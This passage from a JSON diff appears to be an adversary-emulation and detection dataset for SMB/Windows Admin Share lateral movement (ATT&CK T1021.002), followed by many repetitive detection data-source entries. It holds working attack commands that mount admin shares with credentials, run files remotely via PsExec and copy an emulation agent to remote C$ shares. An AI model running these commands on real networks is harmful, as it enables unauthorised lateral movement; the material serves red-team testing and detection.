Shares\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "user_name": { + "description": "Username", + "type": "String", + "default": "DOMAIN\\Administrator" + }, + "share_name": { + "description": "Examples C$, IPC$, Admin$", + "type": "String", + "default": "C$" + }, + "password": { + "description": "Password", + "type": "String", + "default": "P@ssw0rd1" + }, + "computer_name": { + "description": "Target Computer Name", + "type": "String", + "default": "Target" + } + }, + "executor": { + "command": "cmd.exe /c \"net use \\\\#{computer_name}\\#{share_name} #{password} /u:#{user_name}\"\n", + "name": "command_prompt" + } + }, + { + "name": "Map Admin Share PowerShell", + "auto_generated_guid": "514e9cd7-9207-4882-98b1-c8f791bae3c5", + "description": "Map Admin share utilizing PowerShell\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "share_name": { + "description": "Examples C$, IPC$, Admin$", + "type": "String", + "default": "C$" + }, + "map_name": { + "description": "Mapped Drive Letter", + "type": "String", + "default": "g" + }, + "computer_name": { + "description": "Target Computer Name", + "type": "String", + "default": "Target" + } + }, + "executor": { + "command": "New-PSDrive -name #{map_name} -psprovider filesystem -root \\\\#{computer_name}\\#{share_name}\n", + "name": "powershell" + } + }, + { + "name": "Copy and Execute File with PsExec", + "auto_generated_guid": "0eb03d41-79e4-4393-8e57-6344856be1cf", + "description": "Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "command_path": { + "description": "File to copy and execute", + "type": "Path", + "default": "C:\\Windows\\System32\\cmd.exe" + }, + "remote_host": { + "description": "Remote computer to receive the copy and execute the file", + "type": "String", + "default": "\\\\localhost" + }, + "psexec_exe": { + "description": "Path to PsExec", + "type": "string", + "default": "C:\\PSTools\\PsExec.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})\n", + "prereq_command": "if (Test-Path \"#{psexec_exe}\") { exit 0} else { exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile \"$env:TEMP\\PsTools.zip\"\nExpand-Archive $env:TEMP\\PsTools.zip $env:TEMP\\PsTools -Force\nNew-Item -ItemType Directory (Split-Path \"#{psexec_exe}\") -Force | Out-Null\nCopy-Item $env:TEMP\\PsTools\\PsExec.exe \"#{psexec_exe}\" -Force\n" + } + ], + "executor": { + "command": "#{psexec_exe} #{remote_host} -accepteula -c #{command_path}\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Execute command writing output to local Admin Share", + "auto_generated_guid": "d41aaab5-bdfe-431d-a3d5-c29e9136ff46", + "description": "Executes a command, writing the output to a local Admin Share.\nThis technique is used by post-exploitation frameworks.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "output_file": { + "description": "Remote computer to receive the copy and execute the file", + "type": "String", + "default": "output.txt" + }, + "command_to_execute": { + "description": "Command to execute for output.", + "type": "String", + "default": "hostname" + } + }, + "executor": { + "command": "cmd.exe /Q /c #{command_to_execute} 1> \\\\127.0.0.1\\ADMIN$\\#{output_file} 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + }, + { + "id": "40161ad0-75bd-11e9-b475-0800200c9a66", + "name": "Net use", + "description": "Mounts a network file share on a target computer", + "tactic": "lateral-movement", + "technique": { + "attack_id": "T1021.002", + "name": "Remote Services: SMB/Windows Admin Shares" + }, + "platforms": { + "windows": { + "psh": { + "command": "net use \\\\#{remote.host.ip}\\c$ /user:#{domain.user.name} #{domain.user.password};\n", + "cleanup": "net use \\\\#{remote.host.ip}\\c$ /delete;\n" + } + } + }, + "singleton": true + }, + { + "id": "65048ec1-f7ca-49d3-9410-10813e472b30", + "name": "Copy 54ndc47 (SMB)", + "description": "Copy 54ndc47 to remote host (SMB)", + "tactic": "lateral-movement", + "technique": { + "attack_id": "T1021.002", + "name": "Remote Services: SMB/Windows Admin Shares" + }, + "platforms": { + "windows": { + "psh": { + "command": "$path = \"sandcat.go-windows\";\n$drive = \"\\\\#{remote.host.fqdn}\\C$\";\nCopy-Item -v -Path $path -Destination $drive\"\\Users\\Public\\s4ndc4t.exe\";\n", + "cleanup": "$drive = \"\\\\#{remote.host.fqdn}\\C$\";\nRemove-Item -Path $drive\"\\Users\\Public\\s4ndc4t.exe\" -Force;\n", + "parsers": { + "plugins.stockpile.app.parsers.54ndc47_remote_copy": [ + { + "source": "remote.host.fqdn", + "edge": "has_54ndc47_copy" + } + ] + }, + "payloads": [ + "sandcat.go-windows" + ] + } + } + }, + "singleton": true, + "requirements": [ + { + "plugins.stockpile.app.requirements.not_exists": [ + { + "source": "remote.host.fqdn", + "edge": "has_54ndc47_copy" + } + ] + }, + { + "plugins.stockpile.app.requirements.basic": [ + { + "source": "remote.host.fqdn", + "edge": "has_share" + } + ] + }, + { + "plugins.stockpile.app.requirements.no_backwards_movement": [ + { + "source": "remote.host.fqdn" + } + ] + }, + { + "plugins.stockpile.app.requirements.reachable": [ + { + "source": "remote.host.fqdn", + "edge": "isAccessibleFrom" + } + ] + } + ] + }, + { + "id": "aa6ec4dd-db09-4925-b9b9-43adeb154686", + "name": "Mount Share", + "description": "Mount a windows share", + "tactic": "lateral-movement", + "technique": { + "attack_id": "T1021.002", + "name": "Remote Services: SMB/Windows Admin Shares" + }, + "platforms": { + "windows": { + "psh": { + "command": "net use \\\\#{remote.host.fqdn}\\C$ /user:#{domain.user.name} #{domain.user.password}\n", + "cleanup": "net use \\\\#{remote.host.fqdn}\\C$ /delete\n", + "parsers": { + "plugins.stockpile.app.parsers.share_mounted": [ + { + "source": "remote.host.fqdn", + "edge": "has_share" + } + ] + } + } + } + }, + "singleton": true, + "requirements": [ + { + "plugins.stockpile.app.requirements.not_exists": [ + { + "source": "remote.host.fqdn", + "edge": "has_share" + } + ] + }, + { + "plugins.stockpile.app.requirements.basic": [ + { + "source": "domain.user.name", + "edge": "has_password", + "target": "domain.user.password" + } + ] + }, + { + "plugins.stockpile.app.requirements.req_like": [ + { + "source": "remote.host.fqdn", + "edge": "has_admin", + "target": "domain.user.name" + } + ] + }, + { + "plugins.stockpile.app.requirements.reachable": [ + { + "source": "remote.host.fqdn", + "edge": "isAccessibleFrom" + } + ] + }, + { + "plugins.stockpile.app.requirements.no_backwards_movement": [ + { + "source": "remote.host.fqdn" + } + ] + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "network share", + "definition": "Information associated with computer resources made available from one host to other hosts on a computer network using protocols such as Server Message Protocol (SMB) and Network File System (NFS).", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "network share access", + "description": "A network share was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "network share" + }, + { + "data_source": "network share", + "definition": "Information associated with computer resources made available from one host to other hosts on a computer network using protocols such as Server Message Protocol (SMB) and Network File System (NFS).", + "collection_layers": [ + "host" + ], + 